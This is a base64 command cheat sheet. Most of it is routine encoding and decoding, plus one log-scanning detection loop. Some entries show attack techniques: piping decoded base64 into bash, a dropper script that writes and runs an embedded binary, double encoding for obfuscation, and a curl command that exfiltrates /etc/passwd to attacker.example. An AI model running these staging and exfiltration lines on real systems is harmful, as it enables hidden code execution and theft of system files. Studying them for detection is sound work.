base64

Practical base64 techniques including encoding/decoding strings, files, binary data, obfuscation layers, payload staging, and forensic detection workflows

Decode a Base64-Encoded String Using base64 -d

echo "c2VjcmV0Cg==" | base64 -d

Encode a String Without Trailing Newline Using echo -n

echo -n "secret" | base64

Decode Base64 Without Trailing Newline in Output

echo -n "c2VjcmV0" | base64 -d

Encode a File to Base64

base64 file.txt

Decode a Base64 File to Original File

base64 -d encoded.txt > decoded.txt

Encode Binary Data (e.g., Image File) to Base64

base64 image.png > image.b64

Decode Base64 Image Back to Binary Format

base64 -d image.b64 > restored.png

Wrap Base64 Output at Specific Column Width Using -w

echo "secret" | base64 -w 20

Disable Line Wrapping in Base64 Output

echo "secret" | base64 -w 0

Encode File and Store Output in a Variable

encoded=$(base64 file.txt)
echo "$encoded"

Decode Base64 from a Variable

encoded="c2VjcmV0Cg=="
echo "$encoded" | base64 -d

Create a Self-Decoding Bash Payload

echo 'ZWNobyAiSGFja2VkISI=' | base64 -d | bash

Embed a Binary File Directly Inside a Script

Common technique for fileless delivery and portable script-based droppers.

cat <<'EOF' > dropper.sh
#!/bin/bash
base64 -d <<'B64' > payload.bin
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAwARAAAAAAABAAAAAAAAAAJAVAAAAAAAAAAAAAEAAOA==
B64
chmod +x payload.bin
./payload.bin
EOF

Encode and Exfiltrate File Data Over HTTP

base64 /etc/passwd | curl -X POST -d @- https://attacker.example/upload

Detect and Decode Base64 Blobs Inside Logs

grep -Eo '[A-Za-z0-9+/=]{20,}' access.log | while read blob; do
  echo "$blob" | base64 -d 2>/dev/null
done

Double Encode Data for Obfuscation Layers

echo -n "secret" | base64 | base64

Frequently used in obfuscation chains; requires double decoding:

echo "YzJWamNtVjBDZz09" | base64 -d | base64 -d